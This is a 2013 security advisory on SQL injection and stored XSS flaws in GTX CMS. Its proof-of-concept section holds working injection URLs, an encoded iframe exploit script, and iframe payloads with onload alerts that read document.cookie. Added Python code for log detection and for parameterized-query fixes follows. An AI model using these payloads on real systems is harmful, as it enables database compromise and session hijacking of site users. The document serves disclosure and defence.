Document Title:
===============
GTX CMS 2013 Optima - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1124

Release Date:
=============
2013-10-29

Vulnerability Laboratory ID (VL-ID):
====================================
1124

Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and
requirements and tailored to your corporate design! The complete setup of your individual interactive community
portal or your website is done by us, so you can get started right away!

GTX CMS is extremely flexible and can be operated as a closed community (e.g. parallel to your existing website)
and as a normal website with a closed member area. For details, refer to the section `About GTX CMS`.

(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.

Vulnerability Disclosure Timeline:
==================================
2013-10-29: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
OBM-Media e.K.
Product: GTX CMS - Web Application Basic, Standard and Optima

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High
Technical Details & Description:
================================
1.1
Multiple remote SQL injection web vulnerabilities were detected in the official GTX Content Management System 2013 web application.
The vulnerabilities allow remote attackers to inject their own SQL commands without authorization and compromise the web application or the web server's DBMS.

The SQL injection vulnerabilities are located in the vulnerable `objId` and `modId` values of the tagSearchTag module. Remote attackers are
able to inject their own SQL commands via a GET method request to compromise the database management system or the CMS web application. The injection can
be performed through the executable ajax path via a GET method request, or through the objId value in the tagSearchTag module POST method request.
The severity of the remote SQL injection bugs is estimated as high.

Exploitation of the remote SQL injection web vulnerabilities requires no user interaction and a low privileged web application user account.
Successful exploitation of the remote SQL injection bugs results in compromise of the database management system and the CMS or web application.

Vulnerable Module(s):
[+] ajax

Vulnerable File(s):
[+] tagSearchTag

Vulnerable Parameter(s):
[+] objId
[+] modId

1.2
Multiple persistent input validation web vulnerabilities were detected in the official GTX Content Management System 2013 web application.
The web vulnerabilities allow remote attackers to inject their own malicious script code via POST method requests into the online service on the application side.

The first persistent input validation web vulnerability is located in the ajax `tag-searchTag` module and the connected vulnerable
q parameter. Remote attackers are able to inject their own malicious script code as a tag name. The execution occurs in the main communication
module when a user/admin reviews the article or the comments. Exploitation of the vulnerability requires a low privileged
web application user account and only low user interaction (view, no click!).

The second persistent web vulnerability is located in the `linkverzeichnis` (link directory) add module. Remote attackers are able
to inject their own malicious script code as `Schlüsselwörter` (keywords) in the search. The execution occurs in the main link directory
module of the web application. Exploitation of the vulnerability requires a low privileged web application user account and low or
medium user interaction (click!).

The third persistent web vulnerability is located in the `Ordnerverwaltung` (folder/path management) module. Remote attackers are
able to manipulate the vulnerable `ordner` (folder) name value in the add POST method request. The execution occurs in the main path of the
`persoenliche nachrichten` (private messages) module in the CMS control panel. Exploitation of the vulnerability requires a low
privileged web application user account and medium user interaction (add+click!).

Successful exploitation of the remote vulnerabilities leads to persistent session hijacking (customers), account theft via persistent
web attacks, persistent phishing, persistent redirects to external sources, persistent redirects as file downloads or persistent
manipulation of affected and connected context.

Vulnerable Module(s):
[+] ajax/tagSearchTag
[+] suche/linkverzeichnis
[+] pers-nachrichten/ordnerverwaltung

Vulnerable Input(s):
[+] Tags
[+] Suche - Linkverzeichnis > Schlüsselwörter - Suchbegriff(e) & Entfernung von
[+] Ordnerverwaltung - Add

Vulnerable Parameter(s):
[+] q
[+] keywords
[+] ordner
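Both issue classes described above (1.1 and 1.2) leave a recognisable trace in web-server access logs: a `modId`/`objId` value that is not a plain identifier, or a `q` tag name that carries markup. The following detection pass is an added example written for this page, not code from the advisory or from GTX CMS; the combined log format, the client addresses, the sample lines and the assumption that `modId`/`objId` are short `[A-Za-z0-9_]` tokens (as the PoC values `ptd` and `37_` are) are all constructed for it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-log request line; only the client ip and the request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
# Assumption for this example: modId/objId are short [A-Za-z0-9_] tokens like "ptd" and "37_".
ID_RE = re.compile(r'^[A-Za-z0-9_]{1,16}$')
MARKUP_RE = re.compile(r'[<>"\']')

# Constructed sample traffic (not real log data): a clean request, the advisory's
# objId and q payload shapes, and an unrelated page that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Oct/2013:10:00:01 +0100] "GET /Ajax/tagSearchTag?q=golf&modId=ptd&objId=37_ HTTP/1.1" 200 512
10.0.0.9 - - [29/Oct/2013:10:00:07 +0100] "GET /Ajax/tagSearchTag?q=golf&modId=ptd&objId=37_%20%27null-- HTTP/1.1" 500 0
10.0.0.9 - - [29/Oct/2013:10:00:12 +0100] "GET /Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null HTTP/1.1" 200 640
10.0.0.5 - - [29/Oct/2013:10:01:00 +0100] "GET /suche/linkverzeichnis HTTP/1.1" 200 2048
"""

def check_request(target):
    """Return findings for one request target (path + query); [] when it looks clean."""
    parts = urlsplit(target)
    if parts.path.lower() != "/ajax/tagsearchtag":
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded here
    findings = []
    for name in ("modId", "objId"):
        for value in params.get(name, []):
            if not ID_RE.match(value):
                findings.append("%s: non-identifier value %r (possible SQL injection)" % (name, value))
    for value in params.get("q", []):
        if MARKUP_RE.search(value):
            findings.append("q: markup in tag name %r (possible stored XSS)" % value)
    return findings

def scan_log(text):
    """Return (client_ip, findings) for every suspicious line of an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = check_request(m.group("target"))
            if findings:
                hits.append((m.group("ip"), findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

The identifier pattern is the part to adapt to the real installation; if legitimate `objId` values carry other characters, widen `ID_RE` rather than dropping the check.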

Proof of Concept (PoC):
=======================
1.1
The SQL injection web vulnerabilities can be exploited by remote attackers with a low privileged web application user account and
without user interaction. For demonstration or to reproduce ...

PoC:
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNErABILITY!]--
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNErABILITY!]--&objId=3

Exploit:
<script type="text/javascript">document.write(unescape("<script type=\"text\/javascript\
">document.write\(unescape\(\"%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
%20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
%3Dptd%2520%27null%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D
%22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\"\)\);<\/script>"));</script>

1.2
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged web application user accounts
and low user interaction. For demonstration or to reproduce ...

1.2.1

PoC: Tags in Article or News
<div class="right">
<div id="tagTagsWidget">
<ul class="as-selections" id="as-selections-049"><li class="as-selection-item blur"
id="as-selection-002"><a class="as-close">?</a>>"<iframe src="GTX-CMS.de%20%20Mitglieder-
Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm"></iframe></li><li class="as-original"
id="as-original-049"><input autocomplete="off" name="tags" id="as-input-049" class="text as-input" type="text">
<input value=">"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"
<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>,>"
<iframe src=http://vuln-lab.com>," class="as-values" name="as_values_049" id="as-values-049" type="hidden"></li></ul>
<div style="display: none;" class="as-results" id="as-results-049"></div>
</div>

Inject: Tags
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen

PoC (PATH):
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null

1.2.2

PoC: Suchbegriff(e) & Entfernung von

<div class="box">
<div class="formItems">
<div class="item row1">
<div class="left">
Schlüsselwörter</div><div class="right">>"<iframe src="GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,
%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm" onload="alert(document.cookie)" <="" div="">
</div>
</div>
</div>

Inject: Suchbegriff(e) & Entfernung von
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen

Output:
Suche - Linkverzeichnis > Schlüsselwörter
http://gtx-cms.localhost:8080/suche/linkverzeichnis

1.2.3

PoC: Ordnerverwaltung - Ordner Name

<li class="seperator"></li>
<!-- Users folders -->
<li><a class="icon" href="/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-
iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1">
<img src="images/icons/Sophistique/files_24.png" alt="Ordner">
<span>>"<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <="
%20%20.">"<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span>
</a></li>

Inject: Ordnerverwaltung Add
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung

Output: Persönliche Nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung

Solution - Fix & Patch:
=======================
1.1
The SQL injection web vulnerabilities can be patched by a secure parse and encode of the vulnerable `modId` and `objId` values in
the tag search module.

1.2
The persistent input validation web vulnerabilities can be patched by a secure parse and encode of the vulnerable
ordner name, q and keywords parameters.
Encode the output index of the ordner name in the private messages box and connected resources.
Parse the tag search error output to prevent script code executions.
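As an added illustration of the fixes for 1.1 and 1.2 (example code written for this page, not the GTX CMS patch or the advisory author's code), the following Python/sqlite3 handler validates `modId`/`objId` against a strict identifier shape, binds them as query parameters instead of concatenating them into the SQL, and HTML-encodes tag names (and, in the same way, keywords and ordner names) on output. The table schema, the sample rows and the identifier shape are assumptions made for the example.

```python
import html
import re
import sqlite3

# Assumption: module and object ids are short [A-Za-z0-9_] tokens (PoC values: "ptd", "37_").
ID_RE = re.compile(r'^[A-Za-z0-9_]{1,16}$')

def make_db():
    """Constructed in-memory tag table standing in for the CMS database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tags (modId TEXT, objId TEXT, name TEXT)")
    db.executemany("INSERT INTO tags VALUES (?, ?, ?)", [
        ("ptd", "37_", "golf"),
        ("ptd", "37_", "tennis"),
        ("ptd", "37_", '>"<iframe src=a>'),  # a stored tag name that carries markup
        ("ptd", "38_", "secret"),
    ])
    return db

def valid_ids(mod_id, obj_id):
    """Fix 1.1, step one: accept only identifier-shaped modId/objId values."""
    return bool(ID_RE.match(mod_id) and ID_RE.match(obj_id))

def safe_tag_search(db, mod_id, obj_id, q):
    """Fix 1.1, step two: bind the values as parameters instead of pasting them into the SQL."""
    if not valid_ids(mod_id, obj_id):
        raise ValueError("invalid modId/objId")
    rows = db.execute(
        "SELECT name FROM tags WHERE modId = ? AND objId = ? AND name LIKE ?",
        (mod_id, obj_id, "%" + q + "%"),
    )
    return [row[0] for row in rows]

def render_tags(names):
    """Fix 1.2: HTML-encode every tag name (likewise keywords and ordner) on output,
    so a stored '>"<iframe src=a>' is shown as text instead of being parsed as markup."""
    return "".join("<li>%s</li>" % html.escape(name, quote=True) for name in names)

if __name__ == "__main__":
    db = make_db()
    print("PoC objId value accepted?", valid_ids("ptd", "37_ 'null--"))
    print(render_tags(safe_tag_search(db, "ptd", "37_", "")))
```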

Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerabilities is estimated as high(+).

1.2
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com